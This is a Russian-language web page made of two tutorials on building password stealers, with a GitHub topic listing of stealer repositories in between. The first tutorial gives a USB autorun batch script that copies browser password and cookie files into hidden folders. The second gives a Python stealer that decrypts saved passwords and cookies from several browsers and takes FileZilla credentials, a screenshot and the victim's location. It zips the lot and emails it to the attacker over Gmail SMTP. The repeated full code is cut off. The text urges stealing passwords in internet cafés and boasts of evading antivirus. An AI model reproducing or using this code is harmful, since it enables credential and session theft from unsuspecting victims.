Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.
Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.
Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.
Плюсы:
- Не ругается антивирус;
- Скорость работы;
- Простота в доработке;
- Возможность мгновенного запуска;
- Портативность.
Минусы:
- Autorun не работает на Windows 8+;
- Постоянное созданиеудаление autorun.inf;
- Личное присутствие;
- Только для Windows.
Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов
Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.
Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.
Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.
Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.
Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.
Создаём стиллер паролей для браузеров
Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.
Создаём текстовый документ и пишем туда следующий код:
@echo off
md %~d0Mozilla
md %~d0Opera
md %~d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %~d0Opera
copy /y coockies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%~d0/Google”
ATTRIB -R -A -S -H
attrib +h %~d0Mozilla
attrib +h %~d0Opera
attrib +h %~d0Google
del: Autorun.inf
Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.
Теперь нужно создать файл autorun.inf со следующей командой:
[AUTORUN] open=”anyname.bat”
Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.
Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.
Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.
Telegram
Подписывайтесь на официальный Telegram канал сайта Make Info.
Here are
72 public repositories
matching this topic…
Easy to use and open-source stealer that’s super effective
-
Updated
Jul 13, 2023 -
Python
The best discord token grabber made in python
-
Updated
Oct 9, 2023 -
Python
The most powerful stealer written in Python 3 and packed with a lot of features.
-
Updated
Aug 6, 2023 -
Python
A Powerfull Token Stealer!!!! Discord Token Grabber , Password Stealer, Cookie Stealer, File Stealer, Crypto wallet Stealer etc.
-
Updated
Sep 21, 2023 -
Python
This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers supports chromium 80 and above!
-
Updated
Sep 3, 2023 -
Python
🔑 Stealer written on C#, logs will be sent to Telegram bot.
-
Updated
Dec 14, 2021 -
C#
Grabs Discord tokens, browser cookies and passwords; Bypasses any kind of Token Protectors.
-
Updated
Oct 6, 2022 -
C#
Browser Protector against various stealers, written in C# & C/C++.
-
Updated
Sep 19, 2023 -
C#
Umbral Stealer is a fast, lightweight stealer written in C#. The collected data is transferred through discord webhooks.
-
Updated
Jun 26, 2023 -
C#
[ANTI VMWARE UPDATE] [ALL ERRORS FIXED](v2.7.5)Grab token, passwords, cookies, interesting files and more. And have injection.
-
Updated
Oct 8, 2023 -
Python
Big-Papa is a remote cookie stealer which can then be used for session hijacking and Bypassing 2 Factor Authentication
-
Updated
Mar 7, 2022 -
Python
Make u own stealer, steam, exodus, metamask, discord, passwords, cards etc! (This is a shit code, only for scripts basic not for PROFESSIONAL SOFTWARES)
-
Updated
Sep 18, 2023 -
Python
Using this tool, You can capture all WiFi Passwords stored on Windows Computer and mail them to your email account!
-
Updated
Jul 22, 2021 -
Python
Pull sensitive data from users on windows including discord tokens and chrome data.
-
Updated
May 30, 2022 -
Python
The BlackCap Grabber without dual webhook stealer
-
Updated
Mar 26, 2023 -
Python
The most powerful Discord Grabber/stealer written in Python 3 and packed with a lot of features.
-
Updated
Sep 12, 2023 -
Python
A discord token nuker With loads of options that will screw an account up real bad, also has inbuilt massreport and Token/Password/Creditcard grabber and much more!
-
Updated
Oct 18, 2021
Fully undetected grabber (grabs wallets, passwords, cookies, modifies discord client etc.)
-
Updated
Sep 19, 2022 -
JavaScript
An intuitive and higly versatile cookie logger aimed at attacking roblox accounts, discord accounts, and network and sms spamming.
-
Updated
Apr 15, 2023 -
Python
Stealph-botnet its a simpel botnet i code this for fun
-
Updated
May 26, 2020 -
PHP
Improve this page
Add a description, image, and links to the
password-stealer
topic page so that developers can more easily learn about it.
Curate this topic
Add this topic to your repo
To associate your repository with the
password-stealer
topic, visit your repo’s landing page and select «manage topics.»
Learn more
Стиллер паролей на python
Привет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров таких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на котором открыли стиллер, его место нахождение и его установленная система.
Приступим к делу
Создаем новый файл в IDLE Python или в другой IDE.
Подключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.
Все нужные модули
pip install pyinstaller
pip install requests==2.7.0
pip install pywin32
pip install ip2geotools
pip install opencv-python
pip install Pillow
pip install db-sqlite3
pip install temp
import os
from Crypto.Hash import SHA512
import sqlite3
import win32crypt
import email, ssl
import shutil
import requests
import zipfile
import getpass
import ip2geotools
import win32api
import platform
import tempfile
import smtplib
import time
import cv2
import sys
from PIL import ImageGrab
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.message import Message
from email.mime.multipart import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders
from Tools.demo.mcast import sender
from ip2geotools.databases.noncommercial import DbIpCity
from os.path import basename
from smtplib import SMTP
from email.header import Header
from email.utils import parseaddr, formataddr
from base64 import encodebytes
import random
Собираем с пользователя все его данные.
################################################################################
# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #
################################################################################
drives = str(win32api.GetLogicalDriveStrings())
drives = str(drives.split('\000')[:-1])
response = DbIpCity.get(requests.get("https://ramziv.com/ip").text, api_key='free')
all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ramziv.com/ip").text+'\nГород: '+response.city+'\nGen_Location:' + response.to_json() + '\nДиски:' + drives
file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+") #создаем txt с его расположением
file.write(all_data)#записываем данные
file.close()#выходим
Собираем пароли с хрома.
################################################################################
# GOOGLE PASSWORDS #
################################################################################
def Chrome():
text = 'Passwords Chrome:' + '\n'
text += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += url + ' | ' + login + ' | ' + password + '\n'
return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+") #создаем txt с его расположением
file.write(str(Chrome()) + '\n')#записываем данные
file.close()
#выходим
Собираем куки с хрома.
################################################################################
# GOOGLE Cookies #
################################################################################
def Chrome_cockie():
textc = 'Cookies Chrome:' + '\n'
textc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+")
file.write(str(Chrome_cockie()) + '\n')
file.close()
Куки с firefox.
################################################################################
# FIREFOX Cookies #
################################################################################
def Firefox():
textf = ''
textf +='Firefox Cookies:' + '\n'
textf += 'URL | COOKIE | COOKIE NAME' + '\n'
for root, dirs, files in os.walk(os.getenv("APPDATA") + '\\Mozilla\\Firefox\\Profiles'):
for name in dirs:
conn = sqlite3.connect(os.path.join(root, name)+'\\cookies.sqlite')
cursor = conn.cursor()
cursor.execute("SELECT baseDomain, value, name FROM moz_cookies")
data = cursor.fetchall()
for i in range(len(data)):
url, cookie, name = data[i]
textf += url + ' | ' + str(cookie) + ' | ' + name + '\n'
break
return textf
file = open(os.getenv("APPDATA") + '\\firefox_cookies.txt', "w+")
file.write(str(Firefox()) + '\n')
file.close()
Пароли с хромиума.
################################################################################
# CHROMIUM PASSWORDS #
################################################################################
def chromium():
textch ='Chromium Passwords:' + '\n'
textch += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textch += url + ' | ' + login + ' | ' + password + '\n'
return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")
file.write(str(chromium()) + '\n')
file.close()
Куки с хромиума.
################################################################################
# CHROMIUM cookies #
################################################################################
def chromiumc():
textchc = ''
textchc +='Chromium Cookies:' + '\n'
textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")
file.write(str(chromiumc()) + '\n')
file.close()
Пароли с амиго.
################################################################################
# AMIGO PASSWORDS #
################################################################################
def Amigo():
textam = 'Passwords Amigo:' + '\n'
textam += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")
file.write(str(Amigo()) + '\n')
file.close()
Куки с амиго.
################################################################################
# AMIGO cookies #
################################################################################
def Amigo_c():
textamc = 'Cookies Amigo:' + '\n'
textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textamc
file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")
file.write(str(Amigo_c()) + '\n')
file.close()
Пароли с оперы.
################################################################################
# OPERA PASSWORDS #
################################################################################
def Opera():
texto = 'Passwords Opera:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()
Пароли с фаира.
################################################################################
# FIREFOX PASSWORDS #
################################################################################
def Firefox_cookies():
texto = 'Passwords firefox:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox'):
shutil.copy2(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2', os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\firefox_pass.txt', "w+")
file.write(str(Firefox_cookies()) + '\n')
file.close()
Пароли с яндекс браузера.
################################################################################
# YANDEX PASSWORDS #
################################################################################
def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandexe\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textyp += url + ' | ' + login + ' | ' + password + '\n'
return textyp
file = open(os.getenv("APPDATA") + '\\yandex_passwords.txt', "w+")
file.write(str(Yandexpass()) + '\n')
file.close()
Куки с оперы.
################################################################################
# OPERA cookies #
################################################################################
def Opera_c():
textoc ='Cookies Opera:' + '\n'
textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textoc
file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()
Данные с FILEZILLA.
################################################################################
# FILEZILLA #
################################################################################
def filezilla():
try:
data = ''
if os.path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()
for i in range(len(root[0])):
host = root[0][i][0].text
port = root[0][i][1].text
user = root[0][i][4].text
password = base64.b64decode(root[0][i][5].text).decode('utf-8')
data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
return data
else:
return 'Not found'
except Exception:
return 'Error'
textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'
file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")
file.write(str(filezilla()) + '\n')
file.close()
Делаем скриншот экрана.
################################################################################
# SCREEN #
################################################################################
screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')
Тут записываем наши тхт в один ZIP — doc.
################################################################################
# PACKING TO ZIP #
################################################################################
zname = r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
NZ = zipfile.ZipFile(zname,'w')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\yandex_passwords.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\alldata.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\filezilla.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\sreenshot.jpg')
NZ.close()
Вот он наш ZIP по всеми данными.
################################################################################
# DOC-НАШ ZIP #
################################################################################
doc = 'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
Оформляем отправку.
################################################################################
# ОТПРАВКА #
################################################################################
'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')
msgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')
msg = MIMEMultipart()
msg['From'] = 'тут ваша новая почта с которой отправится'
msg['To'] = 'почта на которую отправится'
msg['Subject'] = getpass.getuser() + '-PC'
msg.attach(msgtext)
Тут мы создаем вложение для нашего doc’а ZIP.
################################################################################
# СОЗДАНИЕ Вложения #
################################################################################
part = MIMEBase('application', "zip")
b = open(doc, "rb").read()
bs = encodebytes(b).decode()
part.set_payload(bs)
part.add_header('Content-Transfer-Encoding', 'base64')
part.add_header('Content-Disposition', 'attachment; filename="LOG.zip"')
msg.attach(part)
Здесь мы собственно производим отправку на емаил с помощью SMTP
################################################################################
# ОТПРАВКА ВАМ #
################################################################################
s = smtplib.SMTP('smtp.gmail.com', 587)#ваш почтовый сервис,советую создавать новую гмаил
s.starttls()
s.login('тут ваша новая почта с которой отправится', 'тут пароль от новой почты')
s.sendmail('тут ваша новая почта с которой отправится', 'почта на которую отправится', msg.as_string())
s.quit()
i = input()
Чтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:
На странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к аккаунту, и включите. Тогда все будет ОК.
Весь код
import os
from Crypto.Hash import SHA512
import sqlite3
import win32crypt
import email, ssl
import shutil
import requests
import zipfile
import getpass
import ip2geotools
import win32api
import platform
import tempfile
import smtplib
import time
import cv2
import sys
from PIL import ImageGrab
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.message import Message
from email.mime.multipart import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders
from Tools.demo.mcast import sender
from ip2geotools.databases.noncommercial import DbIpCity
from os.path import basename
from smtplib import SMTP
from email.header import Header
from email.utils import parseaddr, formataddr
from base64 import encodebytes
import random
################################################################################
# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #
################################################################################
drives = str(win32api.GetLogicalDriveStrings())
drives = str(drives.split('\000')[:-1])
response = DbIpCity.get(requests.get("https://ramziv.com/ip").text, api_key='free')
all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ramziv.com/ip").text+'\nГород: '+response.city+'\nGen_Location:' + response.to_json() + '\nДиски:' + drives
file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+")
file.write(all_data)
file.close()
################################################################################
# GOOGLE PASSWORDS #
################################################################################
def Chrome():
text = 'Passwords Chrome:' + '\n'
text += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += url + ' | ' + login + ' | ' + password + '\n'
return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+")
file.write(str(Chrome()) + '\n')
file.close()
################################################################################
# GOOGLE Cookies #
################################################################################
def Chrome_cockie():
textc = 'Cookies Chrome:' + '\n'
textc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+")
file.write(str(Chrome_cockie()) + '\n')
file.close()
################################################################################
# FIREFOX Cookies #
################################################################################
def Firefox():
textf = ''
textf +='Firefox Cookies:' + '\n'
textf += 'URL | COOKIE | COOKIE NAME' + '\n'
for root, dirs, files in os.walk(os.getenv("APPDATA") + '\\Mozilla\\Firefox\\Profiles'):
for name in dirs:
conn = sqlite3.connect(os.path.join(root, name)+'\\cookies.sqlite')
cursor = conn.cursor()
cursor.execute("SELECT baseDomain, value, name FROM moz_cookies")
data = cursor.fetchall()
for i in range(len(data)):
url, cookie, name = data[i]
textf += url + ' | ' + str(cookie) + ' | ' + name + '\n'
break
return textf
file = open(os.getenv("APPDATA") + '\\firefox_cookies.txt', "w+")
file.write(str(Firefox()) + '\n')
file.close()
################################################################################
# CHROMIUM PASSWORDS #
################################################################################
def chromium():
textch ='Chromium Passwords:' + '\n'
textch += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textch += url + ' | ' + login + ' | ' + password + '\n'
return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")
file.write(str(chromium()) + '\n')
file.close()
################################################################################
# CHROMIUM cookies #
################################################################################
def chromiumc():
textchc = ''
textchc +='Chromium Cookies:' + '\n'
textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")
file.write(str(chromiumc()) + '\n')
file.close()
################################################################################
# AMIGO PASSWORDS #
################################################################################
def Amigo():
textam = 'Passwords Amigo:' + '\n'
textam += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")
file.write(str(Amigo()) + '\n')
file.close()
################################################################################
# AMIGO cookies #
################################################################################
def Amigo_c():
textamc = 'Cookies Amigo:' + '\n'
textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
